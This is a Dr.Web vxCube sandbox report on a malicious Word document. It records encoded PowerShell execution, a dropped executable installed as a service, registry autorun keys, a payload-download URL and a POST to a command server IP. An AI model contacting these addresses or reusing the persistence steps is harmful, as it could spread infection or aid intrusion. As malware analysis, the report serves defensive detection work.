
11/27/2019 vxCube — Report

Estimated result: Clean … Malware
Detected: Malicious behavior
Size: 226.3 KB
Format: DOC
SHA1: 2e7587c911694df2230b58df19f5295cc556cfb5


Behavior

Malicious: Launching a process by exploiting the app vulnerability · Sending an HTTP GET request to an infection source

Suspicious: Enabling autorun with the shell\open\command registry branches · Enabling autorun for a service

Neutral: Creating a window · Using the Windows Management Instrumentation requests · Creating a process with a hidden window · DNS request · Creating a file · Creating a process from a recently created file · Moving a file to the %windows% subdirectory · Creating a service · Launching a service · Launching a process · Modifying a system file · Sending an HTTP POST request · Possible injection to a system process

Process graph (legend: sample, known threat, malicious module, process creation, injection, web query, RPC request; process maliciousness scale 1–100)

Nodes: winword.exe:2764 · powershell.exe:876 · 216.exe:3016 · 216.exe:2840 · wmiprvse.exe:2284 · splwow64.exe:1244 · TCP/IP hope.icrisat.org:80

PID: 2764
Full path: %ProgramFiles%\microsoft office\office14\winword.exe
Run parameters: /n "<PATH_SAMPLE>.doc"
Behavior: Creating a window

Description

To ensure autorun and distribution

Modifies the following registry keys:

[<HKLM>\Software\Classes\Spiro.Document\shell\open\command] '' = '%HOMEPATH%\216.exe "%1"'

[<HKLM>\SOFTWARE\CLASSES\Spiro.Document\shell\open\command] '' = '%WINDIR%\SysWOW64\SCALAR~1.EXE "%1"'

Creates the following services:

[<HKLM>\System\CurrentControlSet\Services\scalarbuilder] 'Start' = '00000002'

[<HKLM>\System\CurrentControlSet\Services\scalarbuilder] 'ImagePath' = '"%WINDIR%\SysWOW64\scalarbuilder.exe"'

Malicious functions

Executes the following (exploit):

'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD [base64-encoded command omitted]


Modifies file system

Creates the following files:

%HOMEPATH%\216.exe

Moves the following files:

from %HOMEPATH%\216.exe to %WINDIR%\syswow64\scalarbuilder.exe

Network activity

TCP

HTTP GET requests:

http://hope.icrisat.org/wp-snapshots/d376u2wop-ygs9lfy-56/

HTTP POST requests:

http://190.195.148.163/results/ringin/ringin/merge/

UDP

DNS ASK hope.icrisat.org

Miscellaneous

Creates and executes the following:

'%HOMEPATH%\216.exe'

'%WINDIR%\syswow64\scalarbuilder.exe'

'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD [base64-encoded command omitted] (with hidden window)

Executes the following:

'%WINDIR%\splwow64.exe' 16384

Created files [35] · Dumps [303]

Path | SHA1 | Detected
%APPDATA%\microsoft\templates\normal.dotm | 92a6f1190f833f155b40d97e2287a9516c7035c1 | —
%APPDATA%\microsoft\windows\recent\customdestinations\590aee7bdd69b59b.customdestinations-ms | cac439e385e2b8faef5a041804afc628e71fe0db | —
%APPDATA%\microsoft\windows\recent\customdestinations\969252ce11249fdd.customdestinations-ms | adf35643787affe1afb840f0999bf9e679c7ca86 | —
%APPDATA%\microsoft\windows\recent\customdestinations\969252ce11249fdd.customdestinations-ms~rf16d17d.tmp | adf35643787affe1afb840f0999bf9e679c7ca86 | —
%APPDATA%\microsoft\windows\recent\customdestinations\aq3c0sp0xo03mjw7sbwq.temp | cac439e385e2b8faef5a041804afc628e71fe0db | —
%APPDATA%\microsoft\windows\recent\customdestinations\jhn0k7tyon9s8fzsiqli.temp | adf35643787affe1afb840f0999bf9e679c7ca86 | —
%HOMEPATH%\216.exe | 281f0b8bce96c27d12bbce931079bb77e6c7df13 | —
%LOCALAPPDATA%\gdipfontcachev1.dat | c5cc6b48b8a50ef3cd8a3603253670aa9ee8494f | —
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.mso\233fcb2a.wmf | 8095738d4cb2c6cd77d02b3d4cd2609196cfc354 | —
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.mso\2d64e985.wmf | 8095738d4cb2c6cd77d02b3d4cd2609196cfc354 | —

(1–10 of 35 shown)

API log [640]

Time | Process | Event | Arguments
00:00 | %WINDIR%\explorer.exe:984:2824 | MapSection | "Idle":0, BaseAddr = 0x13f6c0000, ViewSize = 0x15f000, Protect = READWRITE, AllocType = 0, SectionFile '%ProgramFiles%\microsoft office\office14\winword.exe', SectionName '', SectionAttr = SEC_FILE|SEC_IMAGE, SectionOffset = 0x0
00:00 | %WINDIR%\explorer.exe:984:2824 | MapSection | "Idle":0, BaseAddr = 0x77070000, ViewSize = 0x1a9000, Protect = READWRITE, AllocType = 0, SectionFile '<SYSTEM32>\ntdll.dll', SectionName '', SectionAttr = SEC_FILE|SEC_IMAGE, SectionOffset = 0x0
00:00 | %WINDIR%\explorer.exe:984:2824 | PreCreateProcess | "%ProgramFiles%\microsoft office\office14\winword.exe":2764 EntryPoint = 0x13f6c17c4, Peb = 0x7fffffdc000
00:00 | %WINDIR%\explorer.exe:984:2824 | CreateThread | "%ProgramFiles%\microsoft office\office14\winword.exe":2764 StartAddress = 0x13f6c17c4, ContextFlags = 1048587, Parameters = 0x7fffffdc000
00:00 | %WINDIR%\explorer.exe:984:2824 | WriteMemory | "%ProgramFiles%\microsoft office\office14\winword.exe":2764 BaseAddress = 0x50000, WriteSize = 0x20
00:00 | %WINDIR%\explorer.exe:984:2824 | WriteMemory | "%ProgramFiles%\microsoft office\office14\winword.exe":2764 BaseAddress = 0x50020, WriteSize = 0x34
00:00 | %WINDIR%\explorer.exe:984:2824 | WriteMemory | "%ProgramFiles%\microsoft office\office14\winword.exe":2764 BaseAddress = 0x7fffffdc368, WriteSize = 0x8
00:00 | %WINDIR%\explorer.exe:984:2620 | SetValueKey | [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.doc\OpenWithList] 'a' = 'WINWORD.EXE'
00:00 | %WINDIR%\explorer.exe:984:2620 | SetValueKey | [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.doc\OpenWithList] 'MRUList' = 'a'
00:00 | %WINDIR%\explorer.exe:984:2824 | PostCreateProcess | "%ProgramFiles%\microsoft office\office14\winword.exe":2764 CommandLine = '"%ProgramFiles%\Microsoft Office\Office14\WINWORD.EXE" /n "<PATH_SAMPLE>.doc"' EntryPoint = 0x13f6c17c4 Hash = 70353e0b

(1–10 of 640 shown)


Network activity map (legend: less than 5 connections; 5-10 connections; more than 10 connections)

Protocol | Address | Application-level data
IP | 200.109.58.183:443 | —
TCP/IP | hope.icrisat.org:80 | HTTP GET http://hope.icrisat.org/wp-snapshots/d376u2wop-ygs9lfy-56/
TCP/IP | 190.195.148.163:80 | HTTP POST http://190.195.148.163/results/ringin/ringin/merge/
UDP/IP | <DNS_SERVER>:53 | DNS ASK hope.icrisat.org

(1–4 of 4 shown)

© Doctor Web 1992 — 2019 · About vxCube · www.drweb.com